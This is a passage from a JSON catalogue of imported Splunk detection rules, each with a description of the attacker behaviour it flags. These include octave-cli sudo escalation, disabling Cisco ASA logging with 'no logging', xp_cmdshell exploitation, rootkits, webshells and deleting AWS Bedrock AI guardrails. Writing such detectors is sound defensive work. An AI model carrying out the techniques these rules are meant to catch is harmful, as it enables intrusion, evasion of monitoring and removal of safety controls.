with elevated privileges, specifically when it runs system commands via sudo. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line arguments that include \"octave-cli,\" \"--eval,\" \"system,\" and \"sudo.\" This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to execute commands as root. If confirmed malicious, this could lead to full system compromise, enabling an attacker to gain root access and execute arbitrary commands, severely impacting system security and integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-octave-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "78f7487d-42ce-4f7f-8685-2159b25fb477", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_octave_privilege_escalation.yml" } }, { "id": "splunk-security-content-791b727c-deec-4fbe-a732-756131b3c5a1", "type": "detection", "name": "3CX Supply Chain Attack Network Indicators", "description": "The following analytic identifies DNS queries to domains associated with the 3CX supply chain attack. It leverages the Network_Resolution datamodel to detect these suspicious domain indicators. This activity is significant because it can indicate a potential compromise stemming from the 3CX supply chain attack, which is known for distributing malicious software through trusted updates. If confirmed malicious, this activity could allow attackers to establish a foothold in the network, exfiltrate sensitive data, or further propagate malware, leading to extensive damage and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1195.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/3cx-supply-chain-attack-network-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "791b727c-deec-4fbe-a732-756131b3c5a1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/3cx_supply_chain_attack_network_indicators.yml" } }, { "id": "splunk-security-content-79439cae-9200-11eb-a4d3-acde48001122", "type": "detection", "name": "Disable Windows Behavior Monitoring", "description": "The following analytic identifies modifications in the registry to disable Windows Defender's real-time behavior monitoring. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths associated with Windows Defender settings. This activity is significant because disabling real-time protection is a common tactic used by malware such as RATs, bots, or Trojans to evade detection. If confirmed malicious, this action could allow an attacker to execute code, escalate privileges, or persist in the environment without being detected by antivirus software.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-windows-behavior-monitoring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "79439cae-9200-11eb-a4d3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_windows_behavior_monitoring.yml" } }, { "id": "splunk-security-content-799b606e-da81-11eb-93f8-acde48001122", "type": "detection", "name": "Spoolsv Suspicious Process Access", "description": "The following analytic detects suspicious process access by spoolsv.exe, potentially indicating exploitation of the PrintNightmare vulnerability (CVE-2021-34527). It leverages Sysmon EventCode 10 to identify when spoolsv.exe accesses critical system files or processes like rundll32.exe with elevated privileges. This activity is significant as it may signal an attempt to gain unauthorized privilege escalation on a vulnerable machine. If confirmed malicious, an attacker could achieve elevated privileges, leading to further system compromise, persistent access, or unauthorized control over the affected environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spoolsv-suspicious-process-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "799b606e-da81-11eb-93f8-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/spoolsv_suspicious_process_access.yml" } }, { "id": "splunk-security-content-79c7d1fc-64c7-91be-a616-ccda752efe81", "type": "detection", "name": "Windows DLL Search Order Hijacking Hunt with Sysmon", "description": "The following analytic identifies potential DLL search order hijacking or DLL sideloading by detecting known Windows libraries loaded from non-standard directories. It leverages Sysmon EventCode 7 to monitor DLL loads and cross-references them with a lookup of known hijackable libraries. This activity is significant as it may indicate an attempt to execute malicious code by exploiting DLL search order vulnerabilities. If confirmed malicious, this could allow attackers to gain code execution, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dll-search-order-hijacking-hunt-with-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "79c7d1fc-64c7-91be-a616-ccda752efe81", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dll_search_order_hijacking_hunt_with_sysmon.yml" } }, { "id": "splunk-security-content-7a0dda67-4cc7-4113-b3bd-b3f1489a98bf", "type": "detection", "name": "Windows SharePoint Spinstall0 Webshell File Creation", "description": "This detection identifies the creation or modification of the \"spinstall0.aspx\" webshell file in Microsoft SharePoint directories. This file is a known indicator of compromise associated with the exploitation of CVE-2025-53770 (ToolShell vulnerability). Attackers exploit the vulnerability to drop webshells that provide persistent access to compromised SharePoint servers, allowing them to execute arbitrary commands, access sensitive data, and move laterally within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sharepoint-spinstall0-webshell-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7a0dda67-4cc7-4113-b3bd-b3f1489a98bf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sharepoint_spinstall0_webshell_file_creation.yml" } }, { "id": "splunk-security-content-7a5e3d62-f743-11ee-9f6e-acde48001122", "type": "detection", "name": "AWS Bedrock Delete GuardRails", "description": "The following analytic identifies attempts to delete AWS Bedrock GuardRails, which are security controls designed to prevent harmful, biased, or inappropriate AI outputs. It leverages AWS CloudTrail logs to detect when a user or service calls the DeleteGuardrail API. This activity is significant as it may indicate an adversary attempting to remove safety guardrails after compromising credentials, potentially to enable harmful or malicious model outputs. Removing guardrails could allow attackers to extract sensitive information, generate offensive content, or bypass security controls designed to prevent prompt injection and other AI-specific attacks. If confirmed malicious, this could represent a deliberate attempt to manipulate model behavior for harmful purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-bedrock-delete-guardrails.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7a5e3d62-f743-11ee-9f6e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_bedrock_delete_guardrails.yml" } }, { "id": "splunk-security-content-7a85eb24-72da-11ec-ac76-acde48001122", "type": "detection", "name": "Linux Possible Access Or Modification Of sshd Config File", "description": "The following analytic detects suspicious access or modification of the sshd_config file on Linux systems. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving processes like \"cat,\" \"nano,\" \"vim,\" and \"vi\" accessing the sshd_config file. This activity is significant because unauthorized changes to sshd_config can allow threat actors to redirect port connections or use unauthorized keys, potentially compromising the system. If confirmed malicious, this could lead to unauthorized access, privilege escalation, or persistent backdoor access, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-access-or-modification-of-sshd-config-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7a85eb24-72da-11ec-ac76-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_access_or_modification_of_sshd_config_file.yml" } }, { "id": "splunk-security-content-7ab3c319-a4e7-4211-9e8c-40a049d0dba6", "type": "detection", "name": "Windows Terminating Lsass Process", "description": "The following analytic detects a suspicious process attempting to terminate the Lsass.exe process. It leverages Sysmon EventCode 10 logs to identify processes granted PROCESS_TERMINATE access to Lsass.exe. This activity is significant because Lsass.exe is a critical process responsible for enforcing security policies and handling user credentials. If confirmed malicious, this behavior could indicate an attempt to perform credential dumping, privilege escalation, or evasion of security policies, potentially leading to unauthorized access and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-terminating-lsass-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7ab3c319-a4e7-4211-9e8c-40a049d0dba6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_terminating_lsass_process.yml" } }, { "id": "splunk-security-content-7ac0fced-9eae-4381-a748-90dcd1aa9393", "type": "detection", "name": "Windows Office Product Dropped Uncommon File", "description": "The following analytic detects Microsoft Office applications dropping or creating executables or scripts on a Windows OS. It leverages process creation and file system events from the Endpoint data model to identify Office applications like Word or Excel generating files with extensions such as \".exe\", \".dll\", or \".ps1\". This behavior is significant as it is often associated with spear-phishing attacks where malicious files are dropped to compromise the host. If confirmed malicious, this activity could lead to code execution, privilege escalation, or persistent access, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-dropped-uncommon-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7ac0fced-9eae-4381-a748-90dcd1aa9393", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_dropped_uncommon_file.yml" } }, { "id": "splunk-security-content-7add8520-71d5-43aa-b262-ee082b1f0238", "type": "detection", "name": "Linux Medusa Rootkit", "description": "This detection identifies file creation events associated with the installation of the Medusa rootkit, a userland LD_PRELOAD-based rootkit known for deploying shared objects, loader binaries, and configuration files into specific system directories. These files typically facilitate process hiding, credential theft, and backdoor access. Monitoring for such file creation patterns enables early detection of rootkit deployment before full compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1014", "T1589.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-medusa-rootkit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7add8520-71d5-43aa-b262-ee082b1f0238", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_medusa_rootkit.yml" } }, { "id": "splunk-security-content-7aec015b-cd69-46c3-85ed-dac152056aa4", "type": "detection", "name": "Windows WinDBG Spawning AutoIt3", "description": "The following analytic identifies instances of the WinDBG process spawning AutoIt3. This behavior is detected by monitoring endpoint telemetry for processes where 'windbg.exe' is the parent process and 'autoit3.exe' or similar is the child process. This activity is significant because AutoIt3 is frequently used by threat actors for scripting malicious automation, potentially indicating an ongoing attack. If confirmed malicious, this could allow attackers to automate tasks, execute arbitrary code, and further compromise the system, leading to data exfiltration or additional malware deployment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-windbg-spawning-autoit3.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7aec015b-cd69-46c3-85ed-dac152056aa4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_windbg_spawning_autoit3.yml" } }, { "id": "splunk-security-content-7b4c9f3e-5a88-4b7b-9c4b-94d8e5d67201", "type": "detection", "name": "Cisco ASA - Logging Disabled via CLI", "description": "This analytic detects the disabling of logging functionality on a Cisco ASA device\nthrough CLI commands. Adversaries or malicious insiders may attempt to disable logging\nto evade detection and hide malicious activity. The detection looks for specific ASA\nsyslog message IDs (111010, 111008) associated with command execution,\ncombined with suspicious commands such as `no logging`, `logging disable`,\n`clear logging`, or `no logging host`. Disabling logging on a firewall or security device\nis a strong indicator of defense evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-logging-disabled-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7b4c9f3e-5a88-4b7b-9c4b-94d8e5d67201", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___logging_disabled_via_cli.yml" } }, { "id": "splunk-security-content-7b7c2e92-f0b2-48d2-9c9b-b8de52b6b2ae", "type": "detection", "name": "Cisco Secure Firewall - Veeam CVE-2023-27532 Exploitation Activity", "description": "This analytic detects exploitation activity of CVE-2023-27532 using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where Snort signature 61514 (Veeam Backup and Replication credential dump attempt)\nis followed within a 5-minute window by 64795 (Veeam Backup and Replication xp_cmdshell invocation attempt), which detects the use of `xp_cmdshell`, a common post-exploitation technique.\nIf confirmed malicious, this behavior is highly indicative of a successful exploitation of CVE-2023-27532, followed by remote command execution or credential dumping.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1210", "T1059.001", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-veeam-cve-2023-27532-exploitation-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7b7c2e92-f0b2-48d2-9c9b-b8de52b6b2ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___veeam_cve_2023_27532_exploitation_activity.yml" } }, { "id": "splunk-security-content-7b83f666-900c-11ec-a2d9-acde48001122", "type": "detection", "name": "Windows Raw Access To Master Boot Record Drive", "description": "The following analytic detects suspicious raw access reads to the drive containing the Master Boot Record (MBR). It leverages Sysmon EventCode 9 to identify processes attempting to read or write to the MBR sector, excluding legitimate system processes. This activity is significant because adversaries often target the MBR to wipe, encrypt, or overwrite it as part of their impact payload. If confirmed malicious, this could lead to system instability, data loss, or a complete system compromise, severely impacting the organization's operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1561.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-raw-access-to-master-boot-record-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7b83f666-900c-11ec-a2d9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_raw_access_to_master_boot_record_drive.yml" } }, { "id": "splunk-security-content-7b87c556-0ca4-47e0-b84c-6cd62a0a3e90", "type": "detection", "name": "Linux Auditd Change File Owner To Root", "description": "The following analytic detects the use of the 'chown' command to change a file owner to 'root' on a Linux system. It leverages Linux Auditd telemetry, specifically monitoring command-line executions and process details. This activity is significant as it may indicate an attempt to escalate privileges by adversaries, malware, or red teamers. If confirmed malicious, this action could allow an attacker to gain root-level access, leading to full control over the compromised host and potential persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-change-file-owner-to-root.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7b87c556-0ca4-47e0-b84c-6cd62a0a3e90", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_change_file_owner_to_root.yml" } }, { "id": "splunk-security-content-7bc111cc-7f1b-4be7-99fa-50cf8d2e7564", "type": "detection", "name": "GitHub Enterprise Disable Audit Log Event Stream", "description": "The following analytic detects when a user disables audit log event streaming in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for configuration changes that disable the audit log streaming functionality, which is used to send audit events to security monitoring platforms. This behavior could indicate an attacker attempting to prevent their malicious activities from being logged and detected by disabling the audit trail. For a SOC, identifying the disabling of audit logging is critical as it may be a precursor to other attacks where adversaries want to operate undetected. The impact could be severe as organizations lose visibility into user actions, configuration changes, and security events within their GitHub Enterprise environment, potentially allowing attackers to perform malicious activities without detection. This creates a significant blind spot in security monitoring and incident response capabilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-disable-audit-log-event-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7bc111cc-7f1b-4be7-99fa-50cf8d2e7564", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_disable_audit_log_event_stream.yml" } }, { "id": "splunk-security-content-7bc20606-5f40-11ec-a586-acde48001122", "type": "detection", "name": "Linux Possible Append Command To At Allow Config File", "description": "The following analytic detects suspicious command lines that append user entries to /etc/at.allow or /etc/at.deny files. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving these files. This activity is significant because altering these configuration files can allow attackers to schedule tasks with elevated permissions, facilitating persistence on a compromised Linux host. If confirmed malicious, this could enable attackers to execute arbitrary code at scheduled intervals, potentially leading to further system compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-append-command-to-at-allow-config-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7bc20606-5f40-11ec-a586-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_append_command_to_at_allow_config_file.yml" } }, { "id": "splunk-security-content-7bec7c5c-2262-4adb-ba56-c8028512bc58", "type": "detection", "name": "Windows SQL Server Startup Procedure", "description": "This detection identifies when a startup procedure is registered or executed in SQL Server. Startup procedures automatically execute when SQL Server starts, making them an attractive persistence mechanism for attackers. The detection monitors for suspicious stored procedure names and patterns that may indicate malicious activity, such as attempts to execute operating system commands or gain elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sql-server-startup-procedure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7bec7c5c-2262-4adb-ba56-c8028512bc58", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sql_server_startup_procedure.yml" } }, { "id": "splunk-security-content-7c025ef0-9e65-4c57-be39-1c13dbb1613e", "type": "detection", "name": "Windows Server Software Component GACUtil Install to GAC", "description": "The following analytic detects the use of GACUtil.exe to add a DLL into the Global Assembly Cache (GAC). It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because adding a DLL to the GAC allows it to be called by any application, potentially enabling widespread code execution. If confirmed malicious, this could allow an attacker to execute arbitrary code across the operating system, leading to privilege escalation or persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-server-software-component-gacutil-install-to-gac.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7c025ef0-9e65-4c57-be39-1c13dbb1613e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_server_software_component_gacutil_install_to_gac.yml" } }, { "id": "splunk-security-content-7c0348ce-bdf9-45f6-8a57-c18b5976f00a", "type": "detection", "name": "Okta Multi-Factor Authentication Disabled", "description": "The following analytic identifies an attempt to disable multi-factor authentication (MFA) for an Okta user. It leverages OktaIM2 logs to detect when the 'user.mfa.factor.deactivate' command is executed. This activity is significant because disabling MFA can allow an adversary to maintain persistence within the environment using a compromised valid account. If confirmed malicious, this action could enable attackers to bypass additional security layers, potentially leading to unauthorized access to sensitive information and prolonged undetected presence in the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-multi-factor-authentication-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7c0348ce-bdf9-45f6-8a57-c18b5976f00a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_multi_factor_authentication_disabled.yml" } }, { "id": "splunk-security-content-7c0fa490-12b0-4d0b-b9f5-e101d1e0e06f", "type": "detection", "name": "O365 Cross-Tenant Access Change", "description": "The following analytic identifies when cross-tenant access/synchronization policies are changed in an Azure tenant. Adversaries have been observed altering victim cross-tenant policies as a method of lateral movement or maintaining persistent access to compromised environments. These policies should be considered sensitive and monitored for changes and/or loose configuration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-cross-tenant-access-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7c0fa490-12b0-4d0b-b9f5-e101d1e0e06f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_cross_tenant_access_change.yml" } }, { "id": "splunk-security-content-7c921d28-ef48-4f1b-85b3-0af8af7697db", "type": "detection", "name": "AWS Defense Evasion Update Cloudtrail", "description": "The following analytic detects `UpdateTrail` events in AWS CloudTrail logs. It identifies attempts to modify CloudTrail settings, potentially to evade logging. The detection leverages CloudTrail logs, focusing on `UpdateTrail` events where the user agent is not the AWS console and the operation is successful. This activity is significant because altering CloudTrail settings can disable or limit logging, hindering visibility into AWS account activities. If confirmed malicious, this could allow attackers to operate undetected, compromising the integrity and security of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-defense-evasion-update-cloudtrail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7c921d28-ef48-4f1b-85b3-0af8af7697db", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_defense_evasion_update_cloudtrail.yml" } }, { "id": "splunk-security-content-7cd853e9-d370-412f-965d-a2bcff2a2908", "type": "detection", "name": "O365 Multiple Mailboxes Accessed via API", "description": "The following analytic detects when a high number of Office 365 Exchange mailboxes are accessed via API (Microsoft Graph API or Exchange Web Services) within a short timeframe. It leverages 'MailItemsAccessed' operations in Exchange, using AppId and regex to identify API interactions. This activity is significant as it may indicate unauthorized mass email access, potentially signaling data exfiltration or account compromise. If confirmed malicious, attackers could gain access to sensitive information, leading to data breaches and further exploitation of compromised accounts. The threshold is set to flag over five unique mailboxes accessed within 10 minutes, but should be tailored to your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-mailboxes-accessed-via-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7cd853e9-d370-412f-965d-a2bcff2a2908", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_mailboxes_accessed_via_api.yml" } }, { "id": "splunk-security-content-7cfec906-2697-43f7-898b-83634a051d9a", "type": "detection", "name": "Windows Office Product Loading VBE7 DLL", "description": "The following analytic identifies office documents executing 